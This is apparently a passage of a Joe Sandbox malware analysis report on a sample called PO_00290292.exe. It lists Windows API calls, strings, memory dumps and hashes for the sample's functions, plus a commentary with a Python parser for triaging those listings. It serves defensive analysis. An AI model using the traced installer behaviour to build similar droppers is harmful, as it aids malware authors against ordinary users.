                                                                   Uniqueness
                                                                   • Uniqueness Score: -1.00%
                                                                  APIs
                                                                  • Sleep.KERNELBASE(00000000), ref: 004014E6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: Sleep
                                                                  • String ID:
                                                                  • API String ID: 3472027048-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404C71
                                                                  • GetDlgItem.USER32(?,00000408), ref: 00404C7C
                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404CC6
                                                                  • LoadBitmapW.USER32(0000006E), ref: 00404CD9
                                                                  • SetWindowLongW.USER32(?,000000FC,00405251), ref: 00404CF2
                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D06
                                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D18
                                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404D2E
                                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D3A
                                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D4C
                                                                  • DeleteObject.GDI32(00000000), ref: 00404D4F
                                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D7A
                                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D86
                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E1C
                                                                  • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E47
                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E5B
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404E8A
                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404E98
                                                                  • ShowWindow.USER32(?,00000005), ref: 00404EA9
                                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FA6
                                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040500B
                                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405020
                                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405044
                                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405064
                                                                  • ImageList_Destroy.COMCTL32(?), ref: 00405079
                                                                  • GlobalFree.KERNEL32(?), ref: 00405089
                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405102
                                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 004051AB
                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051BA
                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 004051DA
                                                                  • ShowWindow.USER32(?,00000000), ref: 00405228
                                                                  • GetDlgItem.USER32(?,000003FE), ref: 00405233
                                                                  • ShowWindow.USER32(00000000), ref: 0040523A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                  • String ID: $M$N
                                                                  • API String ID: 1638840714-813528018
                                                                  • Opcode ID: 2479b366cad44d8d2a02fbd124e29c277f71441e1411fda8dea8c44bba4244d6
                                                                  • Instruction ID: ce840dee0c3a5b827351c7f25dbf2e3605d0905f5c54158640504e6bfb71dde6
                                                                  • Opcode Fuzzy Hash: 2479b366cad44d8d2a02fbd124e29c277f71441e1411fda8dea8c44bba4244d6
                                                                  • Instruction Fuzzy Hash: 4C023EB0A00209EFDF209F64CD45AAE7BB5FB84355F10817AE610BA2E1C7799D52CF58
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetDlgItem.USER32(?,000003FB), ref: 0040472C
                                                                  • SetWindowTextW.USER32(00000000,?), ref: 00404756
                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00404807
                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404812
                                                                  • lstrcmpiW.KERNEL32(Remove folder: ,00423728,00000000,?,?), ref: 00404844
                                                                  • lstrcatW.KERNEL32(?,Remove folder: ), ref: 00404850
                                                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404862
                                                                    • Part of subcall function 004058A7: GetDlgItemTextW.USER32(?,?,00000400,00404899), ref: 004058BA
                                                                    • Part of subcall function 00406412: CharNextW.USER32(?,*?|<>/":,00000000,00000000,75573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PO_00290292.exe",00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 00406475
                                                                    • Part of subcall function 00406412: CharNextW.USER32(?,?,?,00000000), ref: 00406484
                                                                    • Part of subcall function 00406412: CharNextW.USER32(?,00000000,75573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PO_00290292.exe",00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 00406489
                                                                    • Part of subcall function 00406412: CharPrevW.USER32(?,?,75573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PO_00290292.exe",00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 0040649C
                                                                  • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,00000001,004216F8,?,?,000003FB,?), ref: 00404925
                                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404940
                                                                    • Part of subcall function 00404A99: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B3A
                                                                    • Part of subcall function 00404A99: wsprintfW.USER32 ref: 00404B43
                                                                    • Part of subcall function 00404A99: SetDlgItemTextW.USER32(?,00423728), ref: 00404B56
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                  • String ID: (7B$A$C:\Users\user\AppData\Local\blindsmagningen\Nonprocurement$Remove folder:
                                                                  • API String ID: 2624150263-2451812599
                                                                  • Opcode ID: b1c988a2c75076f1e590c134e256cc95cfc43452e7a67f3061b6eea54995cb3a
                                                                  • Instruction ID: d5aaf60bd55b21875b9c8b9a8d0b3d7e01f34e6f89f3adcbdcc63617e1d21faf
                                                                  • Opcode Fuzzy Hash: b1c988a2c75076f1e590c134e256cc95cfc43452e7a67f3061b6eea54995cb3a
                                                                  • Instruction Fuzzy Hash: B7A191F1A00209ABDB11AFA5CC45AAF77B8EF84354F10847BF601B62D1D77C99418B6D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%
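The API listings in these function records are the raw material of a triage, but they are only useful once the call site, module, arguments and "Part of subcall function" nesting are pulled apart. The following parser is an added example and not part of the Joe Sandbox report; it reads bullet lines in the report's own format, separates direct calls from calls made inside a subcall, and collects the string-like arguments (paths, format strings, section names) that are the quickest pivots during analysis. The sample lines are copied from the SHBrowseForFolderW record above; the field and function names are my own.

```python
import re
from collections import Counter
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample: lines copied verbatim from the function listing above.
SAMPLE = r"""
• GetDlgItem.USER32(?,000003FB), ref: 0040472C
• SetWindowTextW.USER32(00000000,?), ref: 00404756
• SHBrowseForFolderW.SHELL32(?), ref: 00404807
• lstrcatW.KERNEL32(?,Remove folder: ), ref: 00404850
  • Part of subcall function 004058A7: GetDlgItemTextW.USER32(?,?,00000400,00404899), ref: 004058BA
  • Part of subcall function 00406412: CharNextW.USER32(?,*?|<>/":,00000000,00000000,75573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PO_00290292.exe",00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 00406475
• GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,00000001,004216F8,?,?,000003FB,?), ref: 00404925
• wsprintfW.USER32 ref: 00404B43
"""

# One bullet line: optional "Part of subcall function XXXXXXXX:" prefix, then
# Api.MODULE(args), ref: XXXXXXXX. The argument list is optional (see wsprintfW).
LINE_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>.*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
# A plain 32-bit immediate as the report prints it (optionally negated).
HEX_RE = re.compile(r"-?[0-9A-Fa-f]{8}")


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int                 # address of the call site
    subcall: Optional[int]   # callee address when the line is a "Part of subcall" entry


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse the bullet lines of an APIs block; lines that do not match are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        # The report separates arguments with commas. A string argument that itself
        # contains a comma would be split here as well, which is acceptable for triage.
        args = [a.strip() for a in raw.split(",")] if raw is not None else []
        sub = m.group("sub")
        calls.append(ApiCall(
            api=m.group("api"),
            module=m.group("mod").upper(),
            args=args,
            ref=int(m.group("ref"), 16),
            subcall=int(sub, 16) if sub else None,
        ))
    return calls


def is_literal(arg: str) -> bool:
    """True for arguments that are neither unknown ('?') nor a bare hex immediate."""
    return arg not in ("", "?") and HEX_RE.fullmatch(arg) is None


def literal_args(calls: List[ApiCall]) -> List[str]:
    """Distinct string-like arguments in order of first appearance."""
    seen: List[str] = []
    for c in calls:
        for a in c.args:
            if is_literal(a) and a not in seen:
                seen.append(a)
    return seen


def calls_by_module(calls: List[ApiCall]) -> dict:
    """Number of calls per DLL, which gives a quick feel for what a function does."""
    return dict(Counter(c.module for c in calls))


def direct_calls(calls: List[ApiCall]) -> List[ApiCall]:
    """Calls made by the function itself, excluding those attributed to a subcall."""
    return [c for c in calls if c.subcall is None]


def subcall_targets(calls: List[ApiCall]) -> set:
    """Addresses of the callees whose API usage was folded into this listing."""
    return {c.subcall for c in calls if c.subcall is not None}


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE)
    print(calls_by_module(parsed))
    for s in literal_args(parsed):
        print("string:", s)
    for t in sorted(subcall_targets(parsed)):
        print("subcall: %08X" % t)
```

When reading these listings, keep in mind that the report prints small immediates as they appear in the instruction stream, so `GetWindowLongW(?,000000F0)` and `SetWindowLongW(?,000000FC,00405251)` in the record above are consistent with the GWL_STYLE (-16) and GWL_WNDPROC (-4) indices encoded as 8-bit immediates, which would make the second call a subclassing of a control's window procedure with the routine at 0x00405251. That is an interpretation on my part, not something the report states, and the parser deliberately leaves such values as strings rather than guessing at sign extension.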

                                                                  APIs
                                                                  • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\blindsmagningen\Nonprocurement, xrefs: 00402154
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: CreateInstance
                                                                  • String ID: C:\Users\user\AppData\Local\blindsmagningen\Nonprocurement
                                                                  • API String ID: 542301482-4198271790
                                                                  • Opcode ID: 3f37e0e1a3b82b76417f5addfce7e9ce955a39bfd9153315acfc7234e1bdb920
                                                                  • Instruction ID: a109dbacb2976faa502b9a92b0b1fafcf02ea9b6fb783d383e2774f19d5eba59
                                                                  • Opcode Fuzzy Hash: 3f37e0e1a3b82b76417f5addfce7e9ce955a39bfd9153315acfc7234e1bdb920
                                                                  • Instruction Fuzzy Hash: FA412C75A00209AFCF00DFA4CD88AAD7BB6FF48314B20457AF515EB2D1DBB99A41CB54
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040447D
                                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404491
                                                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004044AE
                                                                  • GetSysColor.USER32(?), ref: 004044BF
                                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044CD
                                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044DB
                                                                  • lstrlenW.KERNEL32(?), ref: 004044E0
                                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044ED
                                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404502
                                                                  • GetDlgItem.USER32(?,0000040A), ref: 0040455B
                                                                  • SendMessageW.USER32(00000000), ref: 00404562
                                                                  • GetDlgItem.USER32(?,000003E8), ref: 0040458D
                                                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045D0
                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 004045DE
                                                                  • SetCursor.USER32(00000000), ref: 004045E1
                                                                  • ShellExecuteW.SHELL32(0000070B,open,004281E0,00000000,00000000,00000001), ref: 004045F6
                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00404602
                                                                  • SetCursor.USER32(00000000), ref: 00404605
                                                                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404634
                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404646
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                  • String ID: N$Remove folder: $VC@$open
                                                                  • API String ID: 3615053054-2721566001
                                                                  • Opcode ID: 33f5e1601642234e7e85cd0b58378a626179fffef457767216124dc14c27a8cd
                                                                  • Instruction ID: ef28e404984a924d02769b335405a58d84a4f5c10dd13b46e9d300bde90bb2c1
                                                                  • Opcode Fuzzy Hash: 33f5e1601642234e7e85cd0b58378a626179fffef457767216124dc14c27a8cd
                                                                  • Instruction Fuzzy Hash: 717191B1A00209BFDB10AF60DD45E6A7B69FB94344F00843AFB05B62E0D779AD51CF98
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                  • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                  • String ID: F
                                                                  • API String ID: 941294808-1304234792
                                                                  • Opcode ID: 709e975422cda7ccbb1a7a25ffea5b6ea87087be701c8afe7ff27c60fd663942
                                                                  • Instruction ID: fbc3582f0be17511ef24b6208279bd62f68a22b1f89f17edcf88e24f0ff4dafb
                                                                  • Opcode Fuzzy Hash: 709e975422cda7ccbb1a7a25ffea5b6ea87087be701c8afe7ff27c60fd663942
                                                                  • Instruction Fuzzy Hash: 8E418A71800209AFCF058F95DE459AFBBB9FF44310F00842EF991AA1A0C738EA55DFA4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

APIs
• lstrcpyW.KERNEL32(00426DC8,NUL), ref: 00405EBC
• CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,?,00406040,?,?), ref: 00405EE0
• GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00405EE9
  • Part of subcall function 00405CB8: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F99,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CC8
  • Part of subcall function 00405CB8: lstrlenA.KERNEL32(00000000,?,00000000,00405F99,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CFA
• GetShortPathNameW.KERNEL32(004275C8,004275C8,00000400), ref: 00405F06
• wsprintfA.USER32 ref: 00405F24
• GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 00405F5F
• GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F6E
• lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA6
• SetFilePointer.KERNEL32(0040A588,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A588,00000000,[Rename],00000000,00000000,00000000), ref: 00405FFC
• GlobalFree.KERNEL32(00000000), ref: 0040600D
• CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406014
  • Part of subcall function 00405D53: GetFileAttributesW.KERNELBASE(00000003,00402E84,C:\Users\user\Desktop\PO_00290292.exe,80000000,00000003), ref: 00405D57
  • Part of subcall function 00405D53: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D79
Memory Dump Source
• Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
Similarity
• API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
• String ID: %ls=%ls$NUL$[Rename]
• API String ID: 222337774-899692902
• Opcode ID: b79c81f05b1b833d126071e3cf8f1dbc038624686787cc5f02dad872694d8803
• Instruction ID: 52ae09e4e2a5e81e4d5588e003ad531eff1fe7f7ae6e2de5146a23cae23f7ad9
• Opcode Fuzzy Hash: b79c81f05b1b833d126071e3cf8f1dbc038624686787cc5f02dad872694d8803
• Instruction Fuzzy Hash: EB315330241B19BBD2206B209D08F2B3A5CEF85758F15043BF942F62C2EA7CC9118EBD
Uniqueness
Uniqueness Score: -1.00%

APIs
• CharNextW.USER32(?,*?|<>/":,00000000,00000000,75573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PO_00290292.exe",00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 00406475
• CharNextW.USER32(?,?,?,00000000), ref: 00406484
• CharNextW.USER32(?,00000000,75573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PO_00290292.exe",00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 00406489
• CharPrevW.USER32(?,?,75573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PO_00290292.exe",00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 0040649C
Strings
• "C:\Users\user\Desktop\PO_00290292.exe", xrefs: 00406412
• *?|<>/":, xrefs: 00406464
• C:\Users\user\AppData\Local\Temp\, xrefs: 00406413
Memory Dump Source
• Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
Similarity
• API ID: Char$Next$Prev
